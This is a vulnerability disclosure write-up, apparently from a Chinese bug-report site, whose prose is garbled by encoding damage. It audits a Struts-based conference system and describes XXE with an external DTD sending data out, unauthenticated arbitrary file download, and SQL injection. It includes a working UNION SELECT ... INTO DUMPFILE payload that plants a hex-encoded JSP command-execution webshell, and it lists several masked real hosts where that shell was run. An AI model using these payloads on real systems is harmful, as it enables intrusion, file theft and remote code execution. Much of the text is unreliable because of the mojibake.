### ç®è¦æè¿°ï¼
å
æ¬ sql注å
¥ ä»»ææ件ä¸è½½ è¶æ getshell xmlå®ä½æ³¨å
¥
æè°¢@loopx9大ç帮å©
### 详ç»è¯´æï¼
å 为å¦ä¹ java并ä¸æ¯å¾é¿æ¶é´ï¼ä¹æ²¡æåæ·±å
¥çç 究ãä½æ¯å¨å¦ä¹ ä¹åï¼åç°å¯ä»¥å®¡è®¡åºä¸äºç®åçjavawebæ¼æ´ï¼æ以æ³è¿è¿éå大家å享ä¸ä¸ã
0x01审计ä¹å
é¦å
ï¼ææ¿å°äºæºç ä¹åï¼å¤§æ¦çäºä¸ä¸è¿ä¸ªç³»ç»çæ¶æï¼åç°æ¯éè¿Strutsåçãå¨å
·ä½ç代ç ä¹åï¼æ们å
çä¸ä¸è¿ä¸ªä¼è®®ç³»ç»æä»ä¹åè½ï¼å¨ä»£ç 审计çæ¶åï¼ä¸è½ä¸è¡èçå
è·è¿å»å°±ç代ç ï¼æ们è¦å¦ä¼éè¿åè½å»æ¾é®é¢ç缺é·ãç°å¨ä»¥**.**.**.**:8288/Conf/jsp/main/mainAction.do è¿ä¸ªç«ä¸ºæµè¯æ¡ä¾ã访é®ä¹ååç°ï¼åªæååºäºä¼è®®ï¼ç»å½ï¼ä¸è½½è¿äºåè½ãå
¶ä¸ä¼è®®è¿å
¥éè¦å¯ç ï¼ç¶åè¿æç»å½ãä½æ¯æ æ³æ³¨åç¨æ·ï¼æ以å¨è¿å¥ç³»ç»ä¸ï¼æ们åºè¯¥å»é£ç§æ éç»å½å°±å¯ä»¥å©ç¨çæ¼æ´ï¼å¦æè¦ç»å½æè½å©ç¨é£å°±æ¾å¾å¤ªé¸¡èäºãå
éè¿å¸¸è§çé»çæµè¯å¹¶æ²¡æåç°æ¼æ´ï¼ç®åæ´é²åºæ¥çåè½ï¼ï¼ä¸ä¸æ¥æ们æ¥å®¡è®¡æºç ã
0x02 æºç 审计
å¨å®¡è®¡javawebçæ¶åï¼æç第ä¸æ¥æ¯å»çweb.xmlè¿ç§é
ç½®æ件ï¼å¨è¿ééé¢é
ç½®äºurlçè·¯ç±è§åï¼severletçé
ç½®ï¼ä»¥åfitlerç设置ãå
¶ä¸fitlerçä½ç¨å°±æ¯æä¸åç¼æè
æä¸ç®å½ä¸çæ以æ件åä¸æ¬¡æ¦æªï¼ä¸è¬å°±æ¯ç¨æ¥éªè¯é£äºéè¦ç»å½çåè½ã
ConfWEB-INFweb.xml
“`
requestfilter
**.**.**.**mon.RequestFilter
requestfilter
/*
“`
è¿é设置äºfitlerï¼æ们å®ä½å°**.**.**.**mon.RequestFilter
“`
public class RequestFilter extends HttpServlet
implements Filter
{
private FilterConfig filterConfig;
public void init(FilterConfig filterConfig)
throws ServletException
{
this.filterConfig = filterConfig;
}
public void doFilter(ServletRequest request, ServletResponse response, FilterChain filterChain)
{
try
{
request.setCharacterEncoding(“UTF-8”);
filterChain.doFilter(request, response);
} catch (ServletException sx) {
this.filterConfig.getServletContext().log(sx.getMessage());
} catch (IOException iox) {
this.filterConfig.getServletContext().log(iox.getMessage());
}
}
public void destroy()
{
}
}
“`
è¿å¿åªæ¯è®¾ç½®äºä¸ä¸é¡µé¢ç¼ç 为utf-8,ç¶å继ç»ä¸é¢æä½ï¼ä»è¿å¿å¯ä»¥çåºè¿ä¸ªè¿ä¸ªcms并没æéè¿fitleræ¥åæéæ§å¶ï¼è¿æ ·å°±å¾æå¯è½åå¨æªææçå°æ¹ã
继ç»çweb.xmléé¢çå
容
“`
action
org.apache.struts.action.ActionServlet
config
/WEB-INF/struts-config.xml
debug
2
2
Apache-Axis Servlet
AxisServlet
org.apache.axis.transport.http.AxisServlet
proxoolAdmin
org.logicalcobwebs.proxool.admin.servlet.AdminServlet
action
*.do
AxisServlet
/servlet/AxisServlet
AxisServlet
*.jws
AxisServlet
/services/*
proxoolAdmin
/proxoolAdmin
“`
å¯ä»¥çåºå®ä¹äºproxoolAdmin servlet/AxisServlet /services/* è¿äºurlè·¯ç±ï¼å¹¶ä¸å å«äº/WEB-INF/struts-config.xmlé ç½®æ件ï¼è®©å¨è¿äºurlè·¯ç±ä¸åç°
“`
**.**.**.**:8288//Conf/servlet/AxisServlet
“`
æ´é²äºä¸äºwebservicesçæ¥å£
[](https://images.seebug.org/upload/201603/2313254916bc5282f54fb62c598e7bcf02caf68e.jpg)
“`
**.**.**.**:8288/Conf/proxoolAdmin
“`
æ°æ®åºçä¸äºä¿¡æ¯
[](https://images.seebug.org/upload/201603/23132709738498021249ac5310ad3e2309d3f2da.jpg)
å
çæ´é²åºçwebservicesæ¥å£åå¨ä»ä¹é®é¢
å®ä½ä»£ç webappsConfWEB-INFclassescomv2techcmswebservicesDeptWebService.class
“`
public class DeptWebService
{
public String getWebServiceResult(int tradeCode, String xml, String webservicepass)
{
String rtn = “”;
ReadSystemConfig readSystem = new ReadSystemConfig();
if (!(readSystem.getWebservicespass().equals(webservicepass))) {
return “”;
}
DepartmentWebServiceBiz deptBiz = new DepartmentWebServiceBiz();
switch (tradeCode)
{
case 100:
rtn = deptBiz.addDepartment(xml);
break;
case 200:
rtn = deptBiz.updateDepartment(xml);
break;
case 300:
rtn = deptBiz.deleteDepartment(xml);
}
return rtn;
}
}
“`
å ¶ä¸æ个åæ°ä¸ºxmlï¼ç¶åéè¿ä¸åçtradeCodeï¼å°xmlåæ°ä¼ å ¥å ¶ä»å°æ¹ï¼è·å ¥addDepartmentæ¹æ³
“`
public String addDepartment(String xml)
{
Document document = null;
String deptName = “”;
String deptDesc = “”;
String thirdDeptid = “”;
String thirdParentid = “”;
String usernum = “”;
String inaddress = “”;
String deptorder = “”;
String rtn = “”;
try
{
document = loadXml(xml);
} catch (Exception e) {
return (rtn = “”);
}
………ç祅…..
}
“`
å ¶ä¸xmlè¿å ¥äºloadXmlå½æ°ï¼è¿å¿å¯è½åå¨xmlå®ä½æ³¨å ¥ãæ¥æµè¯ä¸ä¸ãæè¿å¿ä½¿ç¨çæ¯AWVSçwebserviceså·¥å ·
“`
**.**.**.**:8288/Conf/services/BroadcastWebservice?wsdl
“`
[](https://images.seebug.org/upload/201603/231338346df192dbb281f931e34997a0f99b7abb.jpg)
ç´æ¥æ³¨å ¥å®ä½åç°æ¥éäº
[](https://images.seebug.org/upload/201603/23134212d4625da941852af42ae4153024a220bd.jpg)
æ们å°ç¹æ®å符è¿è¡å®ä½htmlç¼ç ä¸æ¬¡ï¼å 为å¨xmlä¸æ¯å¯ä»¥è§£æhtmlç¼ç åçæ°æ®ï¼è¿éå©ç¨gopheråè®®æ¥è·åæ°æ®ã
å
å¨vpsä¸é¢æ°å»ºä¸ä¸ªext.dtdå
容å¦ä¸
“`
“>
%int;
%trick;
“`
å¨vpsä¸é¢çå¬ä½ 设置ç端å£
ç¶åå¨è¯·æ±å
å¤æé
“`
<!DOCTYPE root [
<!ENTITY % xxe SYSTEM “ä½ å¤é¨å®ä½å°å”>
%xxe;
]>
“`
[](https://images.seebug.org/upload/201603/231348278d38e56a59193835eecbcfe731553944.jpg)
æåè·åæ°æ®
[](https://images.seebug.org/upload/201603/23134921455ff2f8d80273d7377082dbea051fe6.jpg)
å
¶ä¸å¯ä»¥åç°è¿ä¸ªgetWebServiceResultæ¹æ³å¨å¤ä¸ªå°æ¹è°ç¨ï¼å¨è¢«è°ç¨çå°æ¹é½åå¨xmlå®ä½æ³¨å
¥
å
æ¬
[](https://images.seebug.org/upload/201603/23135255c323e07f27ca3ef414c5babaa006b856.jpg)
åæå®xmlå®ä½æ³¨å ¥ä¹åï¼æ们继ç»ç代ç ï¼æ们æ¥çstruts-config.xmlä¸çé ç½®ï¼å ³äºstruts-configé ç½®å¯ä»¥çhttps://**.**.**.**/panjun-Donet/articles/1181811.htmlï¼ï¼æ以å¨è¿å¿æ们çéæ¾scope为requestï¼å 为æ们è¿æ ·æ好å©ç¨æ¼æ´ãéé 读代ç åç°è¿ä¸ªcmsæ¯éè¿å¨æ¯ä¸ªclassç±»ä¸æ¥å¤æç¨æ·æ¯å¦ç»å½ï¼ä»£ç å¦ä¸
“`
HttpSession session = servletRequest.getSession();
if (session.getAttribute(“userinfobean”) == null) {
Utils utils = new Utils();
Cookie[] cookies = servletRequest.getCookies();
Locale locale = utils.setLocale(session, servletRequest, cookies);
session.setAttribute(“org.apache.struts.action.LOCALE”, locale);
return actionMapping.findForward(“sessioninvalid”);
}
“`
å¦æ没æç»å½çè¯ï¼å°±éè¿findForwardæ¹æ³å°sessioninvalidï¼ä¹å¨struts-config.xmlä¸å®ä¹ç
“`
“`
[](https://images.seebug.org/upload/201603/23140305f3b7e0c0737490437c8f54d30b605e6e.jpg)
éè¿é
读代ç åç°å å¤æ²¡æåå¨ä»¥ä¸ä»£ç çç±»ï¼è¿ä¹æå³çå¯ä»¥æ éç»å½æ¥å©ç¨æ¼æ´
webappsConfWEB-INFclassescomv2techcmsbasecommonstrutsDownloadAction.class
“`
public class DownloadAction extends Action
{
public ActionForward execute(ActionMapping actionMapping, ActionForm actionForm, HttpServletRequest request, HttpServletResponse response)
{
try
{
String rootfilepath = System.getProperty(“catalina.home”);
String dirpath = File.separator;
rootfilepath = rootfilepath + dirpath + “..” + dirpath + “Server”;
String path = new String(rootfilepath + dirpath + new String(request.getParameter(“path”).getBytes(“ISO8859-1”), “UTF-8”));
File file = new File(path);
String filename = file.getName();
String ext = filename.substring(filename.lastIndexOf(“.”) + 1).toUpperCase();
InputStream fis = new BufferedInputStream(new FileInputStream(path));
byte[] buffer = new byte[fis.available()];
fis.read(buffer);
fis.close();
response.reset();
response.addHeader(“Content-Disposition”, “attachment;filename=” + new String(filename.getBytes()));
response.addHeader(“Content-Length”, “” + file.length());
OutputStream toClient = new BufferedOutputStream(response.getOutputStream());
if (ext.equals(“DOC”))
response.setContentType(“application/msword”);
else {
response.setContentType(“application/octet-stream”);
}
toClient.write(buffer);
toClient.flush();
toClient.close();
} catch (IOException ex) {
ex.printStackTrace();
}
return null;
}
“`
éè¿request.getParameter(“path”)è·åpathç¶å
“`
InputStream fis = new BufferedInputStream(new FileInputStream(path));
byte[] buffer = new byte[fis.available()];
fis.read(buffer);
fis.close();
“`
è¿è¡æ件读åï¼ç¶åä¸è½½ãè¿æ¯ä¸ä¸ªä»»ææ件ä¸è½½
“`
**.**.**.**:8288/Conf/jsp/common/downloadAction.do?path=../management/webapps/root/index.jsp
“`
webappsConfWEB-INFclassescomv2techcmsbulletinstrutsBulletinAction.class
“`
public class BulletinAction extends BaseAction
{
public ActionForward systemBulletin(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
{
UserBean userBean = (UserBean)request.getSession().getAttribute(“userinfobean”);
if (request.getSession().getAttribute(“userinfobean”) == null) {
return mapping.findForward(“sessioninvalid”);
}
saveToken(request);
PageBeans pb = null;
String action = request.getParameter(“action”);
String currentPage = request.getParameter(“currentPage”);
if ((currentPage == null) || (currentPage.equals(“null”))) {
currentPage = “1”;
}
int pageSize = 0;
BulletinManage bulletinmagege = new BulletinManage();
try {
pageSize = bulletinmagege.getRowNumber();
} catch (Exception e) {
e.printStackTrace();
}
pb = new PageBeans(pageSize, 30);
String startend = pb.differentiatePlan(action, Integer.parseInt(currentPage));
String[] pages = startend.split(“:”);
String startPage = pages[0];
String endPage = pages[1];
List bulletin = bulletinmagege.getPages(Integer.parseInt(startPage), Integer.parseInt(endPage));
currentPage = pb.getCurrentPage();
int number = (Integer.parseInt(currentPage) – 1) * 30;
request.setAttribute(“result”, bulletin);
request.setAttribute(“page”, pb);
request.setAttribute(“currentPage”, currentPage);
request.setAttribute(“number”, String.valueOf(number));
return mapping.findForward(“allsysbulletin”);
}
public ActionForward details(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
{
String sysId = request.getParameter(“sysId”);
BulletinManage bulletinBiz = new BulletinManage();
SystembulletinTable sysTable = bulletinBiz.getSysBulletinTable(sysId);
if (sysTable != null) {
sysTable.setContent(Utils.htmlConversion(sysTable.getContent()));
sysTable.setTheme(Utils.htmlConversion(sysTable.getTheme()));
}
request.setAttribute(“details”, sysTable);
return mapping.findForward(“details”);
}
public ActionForward delete(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
throws SQLException
{
BulletinManage bulletinBiz = new BulletinManage();
String sysId = request.getParameter(“sysId”);
bulletinBiz.deleteDate(sysId);
String currentPage = request.getParameter(“page”);
String forword = “/jsp/systembulletin/bulletinAction.do?operator=systemBulletin¤tPage=” + currentPage;
return new ActionForward(forword);
}
public ActionForward modify(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
{
BulletinManage bulletinBiz = new BulletinManage();
String sysId = request.getParameter(“sysId”);
String page = request.getParameter(“page”);
SystembulletinTable sysTable = bulletinBiz.getSysBulletinTable(sysId);
request.setAttribute(“modify”, sysTable);
request.setAttribute(“page”, page);
return mapping.findForward(“modify”);
}
public ActionForward state(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
{
BulletinManage bulletinBiz = new BulletinManage();
BulletinActionForm bulletinActionForm = (BulletinActionForm)form;
String sysId = bulletinActionForm.getSysId();
String indexId = request.getParameter(“indexId”);
request.setAttribute(“indexId”, indexId);
String state = bulletinActionForm.getState();
bulletinActionForm.setNotemeans(“state”);
SystembulletinTable sysTable = new SystembulletinTable();
try {
sysTable.setIdCondition(sysId);
sysTable.selectRecord();
sysTable.setState(state);
bulletinBiz.saveData(sysTable);
} catch (SQLException e) {
e.printStackTrace();
}
String currentPage = request.getParameter(“page”);
String forword = “/jsp/systembulletin/bulletinAction.do?operator=systemBulletin¤tPage=” + currentPage;
return new ActionForward(forword);
}
public ActionForward operation(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
{
BulletinActionForm bulletinActionForm = (BulletinActionForm)form;
SystembulletinTable sysBulletinTable = new SystembulletinTable();
BulletinManage bulletinBiz = new BulletinManage();
String sysId = bulletinActionForm.getSysId();
String theme = bulletinActionForm.getTheme();
theme = theme.trim();
if (theme.length() > 128) {
theme = theme.substring(0, 127);
}
String indexId = request.getParameter(“indexId”);
request.setAttribute(“indexId”, indexId);
String content = “”;
content = bulletinActionForm.getContent();
if (content.length() > 512) {
content = content.substring(0, 512);
}
String operation = request.getParameter(“operation”);
if (operation.equalsIgnoreCase(“return”)) {
return mapping.findForward(“return”);
}
if (sysId != null)
{
sysBulletinTable.setId(sysId);
}
sysBulletinTable.setTheme(theme);
sysBulletinTable.setContent(content);
if (!(isTokenValid(request))) {
saveToken(request);
return mapping.findForward(“bulletin”);
}
try {
String result = bulletinBiz.saveData(sysBulletinTable);
if (result.equals(“”))
return mapping.findForward(“bulletin”);
}
catch (Exception e) {
e.printStackTrace();
}
if (BulletinManage.iForward != 0) {
BulletinManage.iForward = 0;
return mapping.findForward(“bulletin”);
}
String currentPage = request.getParameter(“page”);
String forword = “/jsp/systembulletin/bulletinAction.do?operator=systemBulletin¤tPage=” + currentPage;
return new ActionForward(forword);
}
public ActionForward showIndexList(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
{
BulletinManage bulletinManage = new BulletinManage();
Vector vector = new Vector();
try {
vector = bulletinManage.showBulletin();
} catch (Exception e) {
log.error(“æªåå°å
¬åä¿¡æ¯,请æ£æ¥æ°æ®åºé
ç½®æ¯å¦æ£ç¡®!”);
}
request.setAttribute(“vector”, vector);
return mapping.findForward(“sysBulletin”);
}
public ActionForward ajax(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
{
String sysId = request.getParameter(“sysId”);
BulletinManage bulletinBiz = new BulletinManage();
SystembulletinTable sysTable = bulletinBiz.getSysBulletinTable(sysId);
PrintWriter out = null;
try {
out = response.getWriter();
if (sysTable == null)
out.print(0);
else
out.print(1);
}
catch (IOException e) {
e.printStackTrace();
} finally {
if (out != null) {
out.close();
out = null;
}
}
return null;
}
public ActionForward getNews(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
{
BufferedReader br = null;
PrintWriter out = null;
try {
request.setCharacterEncoding(“UTF-8”);
response.setContentType(“Content-Type:text/html;charset=UTF-8”);
response.setCharacterEncoding(“UTF-8”);
response.setHeader(“Charset”, “UTF-8”);
out = response.getWriter();
String path = request.getSession().getServletContext().getRealPath(“../../../Server/ml.config”);
String managerUrl = null;
String beginStr = “”;
String endStr = “”;
managerUrl = new Utils().getMasterIp(path, beginStr, endStr);
String contextpath = request.getContextPath();
URL url = new URL(managerUrl + contextpath + “/jsp/systembulletin/bulletinAction.do?operator=getMasterNews”);
InputStream in = url.openStream();
br = new BufferedReader(new InputStreamReader(in, “UTF-8”));
String str = br.readLine();
out.write(str);
} catch (Exception e) {
out.write(“0”);
log.error(“[getNews]: throws Exception!”, e);
} finally {
try {
if (br != null) {
br.close();
br = null;
}
} catch (IOException e) {
br = null;
} finally {
if (out != null) {
out.close();
out = null;
}
}
}
return null;
}
public ActionForward getMasterNews(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
{
PrintWriter out = null;
try {
request.setCharacterEncoding(“UTF-8”);
response.setContentType(“Content-Type:text/html;charset=UTF-8”);
response.setCharacterEncoding(“UTF-8”);
response.setHeader(“Charset”, “UTF-8”);
out = response.getWriter();
int in = new BulletinManage().getMasterNews();
out.write(in + “”);
} catch (Exception e) {
out.write(“0”);
log.error(“[getMasterNews]: throws Exception!”, e);
} finally {
if (out != null) {
out.close();
out = null;
}
}
return null;
}
“`
å¨è¿ä¸ªç±»ä¸åªæsystemBulletinæ¹æ³éªè¯äºæ¯å¦ç»å½ï¼å
¶ä»çæ¹æ³é½æ²¡éªè¯ãç¶åå¨è¿ä¸ªç±»ä¸ååå¨å¤ä¸ªsql注å
¥ãç±äºè¿å¥ç³»ç»é»è®¤æ¯tomcat+mysqlè¿æ ·çæ¶æï¼å
¶ä¸webè·¯å¾æ¯ä¸ååçï¼èä¸ä½¿ç¨mysqlçrootç¨æ·ï¼æ以ç´æ¥å¯ä»¥éè¿sql注å
¥æ¥getshellãå
¶ä¸detailsæ¹æ³ï¼å·²ç»å¨https://**.**.**.**/bugs/wooyun-2010-0143276æ交è¿äº
ä¸é¢æ以modifyæ¹æ³ä¸ºä¾
“`
public ActionForward modify(ActionMapping mapping, ActionForm form, HttpServletRequest request, HttpServletResponse response)
{
BulletinManage bulletinBiz = new BulletinManage();
String sysId = request.getParameter(“sysId”);
String page = request.getParameter(“page”);
SystembulletinTable sysTable = bulletinBiz.getSysBulletinTable(sysId);
request.setAttribute(“modify”, sysTable);
request.setAttribute(“page”, page);
return mapping.findForward(“modify”);
}
“`
éè¿ request.getParameterè·åsysIdç¶åè¿å ¥bulletinBiz.getSysBulletinTable
“`
public SystembulletinTable getSysBulletinTable(String sysId)
{
SystembulletinTable sysTable = new SystembulletinTable();
try {
sysTable.setIdCondition(sysId);
if (!(sysTable.selectRecord()))
sysTable = null;
}
catch (SQLException e) {
e.printStackTrace();
}
return sysTable;
}
“`
ç¶åè¿å ¥äºsqlä¹ä¸ã
“`
**.**.**.**:8288/Conf/jsp/systembulletin/bulletinAction.do?operator=modify&sysId=1 order by 5
“`
è¿åæ£å¸¸
“`
**.**.**.**:8288/Conf/jsp/systembulletin/bulletinAction.do?operator=modify&sysId=1 order by 6
“`
è¿å为空ï¼ç¡®å®ä¸ºäºä¸ªå段ãç¶åå°±å¯ä»¥ç´æ¥åshelläºã
æé
“`
**.**.**.**:8288/Conf/jsp/systembulletin/bulletinAction.do?operator=modify&sysId=1 UNION SELECT 1,2,3,4,0x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E into dumpfile ‘../../management/webapps/root/test.jsp’%23
“`
æåçæ**.**.**.**:8288/test.jsp?cmd=whoami
[](https://images.seebug.org/upload/201603/2314414666524025a53ad0d96f0d76a005b1be3a.jpg)
webappsConfWEB-INFclassescomv2techcmsuserstrutsDeleteDeptAction.class
package com.v2tech.cms.user.struts;
“`
public class DeleteDeptAction extends Action
{
public ActionForward execute(ActionMapping actionMapping, ActionForm actionForm, HttpServletRequest servletRequest, HttpServletResponse servletResponse)
{
int deptid = Integer.parseInt(servletRequest.getParameter(“deptid”));
DepartmentDao deptdao = new DepartmentDao();
deptdao.deleteDepartmentByDeptId(deptid);
return actionMapping.findForward(“deldeptresult”);
}
}
“`
å¯ä»¥å é¤ä»»æé¨é¨ï¼ä¸æ éç»å½
### æ¼æ´è¯æï¼
æ¡ä¾
[](https://images.seebug.org/upload/201603/231446103660f64beefe06e5aea79be76770d61a.jpg)
ééæµè¯äºä¸äº
“`
https://**.**.**.**:18080/test.jsp?cmd=whoami
**.**.**.**/test.jsp?cmd=whoami
https://**.**.**.**/test.jsp?cmd=whoami
https://**.**.**.**:443//test.jsp?cmd=whoami
https://**.**.**.**/test.jsp?cmd=whoami
**.**.**.**:8288/test.jsp?cmd=whoami
https://**.**.**.**/test.jsp?cmd=whoami
https://**.**.**.**/test.jsp?cmd=whoami
https://**.**.**.**/test.jsp?cmd=whoami
“`
xxeæµè¯
[](https://images.seebug.org/upload/201603/23145140619adb176ef5e6f78e3fc61799113e11.jpg)Read More